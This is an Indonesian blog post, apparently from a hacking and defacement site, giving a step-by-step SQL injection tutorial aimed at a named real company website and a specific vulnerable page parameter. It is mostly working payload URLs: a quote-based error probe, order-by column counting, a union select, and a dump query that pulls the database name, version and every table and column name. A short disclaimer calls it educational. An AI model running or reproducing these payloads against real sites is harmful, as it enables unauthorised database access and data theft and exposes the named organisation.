Beranda
DEFACE
HACKING

SQL Injection #1


sql injection
sql injection

Tutorial SQL Injection bypass redirect to homepage part 1

Perhatian: Tutorial pada halaman ini hanyalah pembelajaran semata, jika anda menerapkan tutorial pada halaman ini untuk sebuah penyerangan jangan salahkan saya, saya tidak akan bertanggung jawab atas apa yang anda lakukan nantinya, karena halaman ini tidak menyarankan anda untuk melakukan hal buruk pada website yang anda inject

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya memberikan tutorial SQL Injection.

Target website yang bakalan inject: 
https://telkompcc.co.id/
Nah untuk parameter buat injectnya tinggal disearch aja di google, caranya? Ketik pada kolom pencarian google.
site:urlwebsite.com .php?=
mencari parameter
mencari parameter


Nah kalo udah dapat parameternya coba ketik tanda ' diurl lalu tekan enter, contoh. 


https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'
error sql injection
error


Nah, saat saya kasi tanda ' halamannya jadi berubah, atau muncul error, brarti webnya vuln sql injection, klo udh gitu kasi tanda --+- atau -- -, contoh.


https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'--+-
sql injection
sql injection


PNah kan kembali lagi ke home, kalo gitu lanjut ke langkah selanjutnya yaitu memasukan query order by atau sejenisnya seperti group by, oke langsung aja kelangkah selanjutnya. 

https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+1--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+2--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+3--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+4--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+5--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+6--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+7--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+8--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+9--+- NORMAL
https://telkompcc.co.id/neo/detail_cert_marketing.php?id=2'+order+by+10--+- ERROR

ternyata jumlah kolomnya ada 9,sesuai query yg dimasukan, karena Errornya diangka 10 berarti jumlah kolomnya ada 9,oke langkah selanjutnya adalah memasukan query union select untuk mengetahui angka togelnya sekaligus menambahkan tanda - dibelakang angka parameter, contoh. 

https://telkompcc.co.id/neo/detail_cert_marketing.php?id=-2+union+select+1,2,3,4,5,6,7,8,9--+-
Seperti query diatas bahwa jumlah angka 1 sampai 9 tergantung jumlah Kolomnya hugs, jadi kalo jumlah kolomnya ada 100 berarti saat query union select 1 sampai 100, oke disini angka togelnya sudah muncul, jadi tinggal tempel aja dios sqli anda sesuai angka yang muncul pada halaman di url query union select, contoh.


https://telkompcc.co.id/neo/detail_cert_marketing.php?id=-2%27+union+select+1,2,concat(0x496E6A6563746564204279204D722058202D2054776F2047616E73202626202E2F4E616E615F43616E73,%27%3Cbr%3E%3Cbr%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9--+-

Nah berikut adalah tampilan halaman saat di execute.

sql injection
sql injection

Jika masih tidak paham, anda bisa menonton video dibawah. 


Nahkan isi databasenya muncul, okelah sekian tutorial sql injection pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum. 

Baca juga :

Posting Komentar